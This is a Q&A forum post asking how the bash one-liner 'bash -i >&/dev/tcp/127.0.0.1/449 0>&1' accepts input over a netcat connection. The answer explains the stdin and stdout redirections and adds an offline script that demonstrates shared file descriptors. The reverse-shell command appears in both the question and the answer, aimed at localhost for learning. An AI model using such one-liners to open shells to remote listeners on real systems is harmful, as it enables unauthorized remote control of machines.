Tags: bash, netcat, penetration-testing, reverse-shell

How does this bash reverse shell accept input?


I have a listener running on localhost for port 449 using netcat.

In a separate terminal also running on localhost I can run the following command:

bash -c "bash -i >&/dev/tcp/127.0.0.1/449 0>&1"

I am then able to enter commands through the netcat connection and they execute successfully. I can break down the above command and I am able to see that the bash shell above writes its stderr and stdout to the socket file descriptor, which is sent to my machine and ends up listened to by netcat. Additionally, I can see that the standard input is sent to standard output, and is then executed by the outer bash command.

A few questions on this:

  1. What is the mechanism that sets up the bash terminal to accept the standard input from netcat? The stdin isn't redirected anywhere in the command.
  2. How does the outer bash shell execute more than a single command output from the inner bash shell? My initial thoughts were that it would only be able to execute a single command.

Solution

  • The outer bash only launches the inner bash, and cannot take commands after that. So you can run the inner bash directly:

    bash -i >&/dev/tcp/127.0.0.1/449 0>&1
    

    >&/dev/tcp/127.0.0.1/449 redirects stdout and stderr to the TCP connection.

    0>&1 redirects stdin to the same connection.
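The following script is an added example, not part of the question or the answer above, that makes the redirection mechanics visible without any network: `>&target` is bash shorthand for `>target 2>&1`, and `0>&1` then duplicates descriptor 1 onto descriptor 0, so stdin, stdout and stderr all refer to one open file description. A `/dev/tcp/...` socket is read-write by nature, which is why reads on the duplicated stdin succeed; a regular file stands in for the socket here and must be opened read-write (`1<>file`) to behave the same way. The function names `demo_shared_fd`, `demo_write_only` and `count_matches`, and the single constructed input line, are this example's own choices.

```shell
# Added example: shows why `bash -i >&target 0>&1` can read commands from
# the same descriptor it writes to. A read-write regular file replaces the
# /dev/tcp socket so this runs offline.

# demo_shared_fd FILE
# Writes one constructed line of "remote" input into FILE, then runs an inner
# bash whose stdout, stderr and stdin all refer to ONE read-write open file
# description on FILE. `bash -s` reads commands from stdin, as `bash -i` does
# in the original command. Prints the final contents of FILE: the command
# text followed by the output the inner shell wrote back into the same file.
demo_shared_fd() {
  f="$1"
  printf 'echo hello-from-stdin\n' > "$f"
  # 1<> opens fd 1 read-write (a /dev/tcp socket is read-write anyway),
  # 2>&1 dups it onto stderr, 0>&1 dups it onto stdin, exactly what the
  # answer's `>&target 0>&1` does.
  bash -s 1<>"$f" 2>&1 0>&1
  cat "$f"
}

# demo_write_only FILE
# Same wiring, but fd 1 is opened write-only with >>. Duplicating it onto
# fd 0 still succeeds, yet reading from fd 0 fails (EBADF), so the inner
# shell never executes the command. Prints the final contents of FILE,
# which still holds only the unexecuted command text (plus any read error
# bash reports on its stderr, which is the same file).
demo_write_only() {
  f="$1"
  printf 'echo hello-from-stdin\n' > "$f"
  # The inner shell's exit status is not the point here, so ignore it.
  bash -s >>"$f" 2>&1 0>&1 || :
  cat "$f"
}

# count_matches FILE PATTERN
# Number of lines in FILE containing PATTERN (prints 0 rather than failing).
count_matches() {
  grep -c -- "$2" "$1" || :
}

# Usage (creates a temporary file and prints both outcomes):
#   tmp=$(mktemp); demo_shared_fd "$tmp"; echo ---; demo_write_only "$tmp"; rm -f "$tmp"
```

In the read-write case the file ends up holding both the command and its output, because the inner shell read the command through fd 0 and wrote the result through fd 1, and both are the same open file description with a shared offset. In the write-only case only the command text remains, which is the situation the original command avoids by using a socket.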